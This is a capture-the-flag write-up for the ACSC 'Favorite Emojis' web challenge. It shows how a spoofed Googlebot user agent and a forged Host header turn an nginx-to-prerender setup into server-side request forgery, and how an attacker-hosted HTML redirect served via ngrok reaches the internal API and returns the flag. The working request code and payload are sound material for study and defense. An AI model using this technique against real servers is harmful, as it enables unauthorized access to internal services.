# Favorite Emojis

> WEB | 330
>
> 🎈
>
>
>                                 🏃
>
> http://favorite-emojis.chal.acsc.asia:5000
>
> Attachment: favorite-emojis.tar.gz (md5 88c58c7d867bcad99c40a2013cc77a58)

- Checking `docker-compose.yml`, there are 3 containers
  - `web` with nginx and is the only network exposed container
  - `api` with a flask app, listening on port 8000
  - `prerender` which runs `tvanro/prerender-alpine`, listening on port 3000
- Opening the page itself, we see a list of some emojis

![](webpage.png)

In [1]:
import requests
url = "http://favorite-emojis.chal.acsc.asia:5000/"
res = requests.get(url)
print("\n".join(res.text.split("\n")[23:31]))

            <main>                        
                <div class="table-responsive">
                <table class="table text-center">
                    <tbody id="tables">
                    </tbody>
                </table>
                </div>
            </main>


- The `prerender` container has [source on github](https://github.com/tvanro/prerender-alpine)
- It runs a slim instance with the [prerender](https://www.npmjs.com/package/prerender) npm package
- The container listens for any HTTP queries, then using a url specified in the request path it opens the url in a headless chrome instance and returns HTML

- The `api` container has a simple flask app with two main endpoints
- `/v1/get_emojis` returns some static data
- `/` root path returns flag!

```python
@app.route("/", methods=["GET"])
def root():
    return FLAG
```

- The `nginx` container however blocks direct access to the flag
- Requests to the `/api/` path will be forwarded to the `api` container with a prepended `/v1/` path, disallowing direct access to the root path which will return flag
- Requests with a suitable user agent will be forwarded to the `prerender` container
  - The container is asked to query a url derived from `$host` and `$request_uri` parameters
  - Notably it will drop the spefified port
- All other requests are redirected to a static `index.html` file served by nginx

```conf
; nginx.conf
set $prerender 0;
if ($http_user_agent ~* "googlebot|bingbot|<...>|whatsapp") { ; truncated
    set $prerender 1;
}
; ...
if ($uri ~* "\.(js|css|<...>|eot)") { ; truncated
    set $prerender 0;
}
; ...
if ($prerender = 1) {
    rewrite .* /$scheme://$host$request_uri? break;
    proxy_pass http://renderer:3000;
}
if ($prerender = 0) {
    rewrite .* /index.html break;
}
```

- Since the flask server seems stable, we can focus on the nginx container first
- To get a request to `prerender`, we can spoof the user agent when making requests
- But this seems to time out?

In [2]:
res = requests.get(url, headers={
  'User-Agent': 'Googlebot'
})
print(res.text)

<html><head></head><body></body></html>


- Obviously the request is hitting the `prerender` container because there is lag
- This is because the port is stripped when the URL is forwarded
- Right now, a request like above will get prerender to open "http://favorite-emojis.chal.acsc.asia/" (without port 5000) which will not load
  - This won't work even if we specify port number in the `host` header
- Can we try spoofing a different host?

In [3]:
url = "http://favorite-emojis.chal.acsc.asia:5000/"
res = requests.get(url, headers={
  'host': 'score.acsc.asia',
  'User-Agent': 'Googlebot'
})
print(res.text[:200])

<!DOCTYPE html><html style="--chakra-ui-color-mode:light;"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width"><meta name="next-head-count" content="2"><noscript data-n-css=


- This successfully loaded the CTF landing page
- We have SSRF from inside the docker subnet, and can control host, path (so long as it does not point to js, css or other 'static' extensions) but cannot control port
  - Because we cannot control port, we cannot directly SSRF to `http://api:8000/` as port `8000` is required
- We can forge a GET request and receive the html data after JS has been executed
- Solution is to host own `.html` file which will redirect to the api server

- Craft exploit.html and serve with `http.server` and `ngrok`

```html
<!-- exploit.html -->
<!DOCTYPE html>
<head>
  <title>Document</title>
</head>
<body>
  <script>
    window.location = "http://api:8000"
  </script>
</body>
</html>
```

```bash
$ python3 -m http.server
```
```
$ ngrok http 8000
```

![](server.png)

In [4]:
url = "http://favorite-emojis.chal.acsc.asia:5000/exploit.html"
res = requests.get(url, headers={
  'host': 'da07-138-75-56-31.ngrok.io',
  'User-Agent': 'Googlebot'
})
print(res.text)

<html><head></head><body>ACSC{sharks_are_always_hungry}</body></html>


Flag: `ACSC{sharks_are_always_hungry}`